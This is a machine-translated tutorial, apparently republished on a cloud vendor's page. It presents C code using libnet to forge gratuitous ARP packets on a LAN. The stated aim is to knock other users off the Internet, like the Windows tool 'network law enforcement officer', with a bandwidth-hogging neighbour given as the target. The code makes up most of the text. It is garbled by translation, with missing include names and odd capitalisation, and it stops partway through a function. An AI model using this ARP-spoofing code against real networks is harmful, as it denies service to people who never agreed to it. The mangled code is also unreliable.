Use libnet to implement "cyber law enforcement officer" on linux"

Source: Internet
Author: User
Article title: use libnet to implement cyber law enforcement on linux. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.

In the old age of reading, there was a network software called "network law enforcement officer" on windows. I believe many of my friends have used it. I found that my website could not be opened because of who is in bt on the LAN, I directly told him that I am afraid I am offended. what should I do? open the cyber law enforcement officer and simply configure it so that he will not be able to access the Internet.

Of course, the current version of the cyber law enforcement officer has rich functions, but its principle is still the same as before. it uses arp spoofing to fill in the Gateway address to be forged, then the cyber law enforcement officer will broadcast free arp packets in the lan, and other machines will not be able to get out of the Internet. one sentence: very strong, very violent!

In Linux, arp frames need to be directly constructed. using other technologies, it is very complicated. using libnet, an open-source library, the core code can be completed in dozens of lines.

Most linux distributions and other unix systems have libnet. check if your system has the libnet-config command.

If not, you can download and install it on its home page:

Http://www.packetfactory.net/libnet

In addition, check whether your system has Version 1.1 or 1.0. The two versions of the API are very different. here we use the latest version 1.1. if not, please upgrade it.

Gcc garp. c-o garp-lnet

Run:

-H: view the command line,

-F specifies the output interface. If this parameter is not specified, an interface is selected,

-T specifies the sending interval of free arp packets. the default value is 5 seconds,

Example:

./Garp-f eth0 192.168.1.1 192.168.2.1

# Include

# Include

# Include

# Include

# Include

# Include

# Include

# Include

# Include

# Define MAX_IP_NUM 32

Static char * pname = "";

Static char * ifname = NULL;

Static struct in_addr ipaddrs [MAX_IP_NUM];

Static int timer = 5;

Static int

Get_hw_addr (char * dev, unsigned char macbuf [6])

{

Libnet_t * l;

Char errbuf [LIBNET_ERRBUF_SIZE] = "";

Struct libnet_ether_addr * mac;

L = libnet_init (LIBNET_LINK, dev, errbuf );

If (! L ){

Fprintf (stderr, "libnet_init: % s \ n", errbuf );

Return-1;

}

Mac = libnet_get_hwaddr (l );

If (! Mac ){

Fprintf (stderr, "libnet_get_hwaddr: % s \ n", libnet_geterror (l ));

Libnet_destroy (l );

Return-1;

}

Memcpy (macbuf, mac-> ether_addr_octet, 6 );

Libnet_destroy (l );

Return 0;

}

Static int

Send_garp (char * ifname, long ipaddr)

{

Unsigned char bcast_mac [6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff };

Unsigned char zero_mac [6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

Unsigned char mymac [6] = {0x00 };

Libnet_t * l;

Char errbuf [LIBNET_ERRBUF_SIZE] = "";

Int I, ret = 0;

If (get_hw_addr (ifname, mymac )! = 0 ){

Return-1;

}

L = libnet_init (LIBNET_LINK, ifname, errbuf );

If (! L ){

Fprintf (stderr, "libnet_init: % s \ n", errbuf );

Return-1;

}

For (I = 0; I <2; I ++ ){

If (libnet_build_arp (ARPHRD_ETHER,/* hardware address type */

ETHERTYPE_IP,/* protocol address type */

6,/* Hardware address length */

4,/* protocol address length */

(I = 0 )? ARPOP_REQUEST: ARPOP_REPLY,/* ARP operation type */

Mymac,/* sender Hardware address */

(Unsigned char *) & ipaddr,/* sender protocol address */

(I = 0 )? Zero_mac: mymac,/* target hardware address */

(Unsigned char *) & ipaddr,/* target protocol address */

NULL,/* Payload */

0,/* Length of payload */

L,/* libnet context pointer */

0/* packet id */

) =-1 ){

Fprintf (stderr, "libnet_build_arp: % s \ n", libnet_geterror (l ));

Ret =-1;

Break;

}

If (libnet_build_ethernet (bcast_mac, mymac, ETHERTYPE_ARP, NULL, 0,

L, 0) =-1 ){

Fprintf (stderr, "libnet_build_ethernet: % s \ n", libnet_geterror (l ));

Ret =-1;

Break;

}

[1] [2] Next page

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.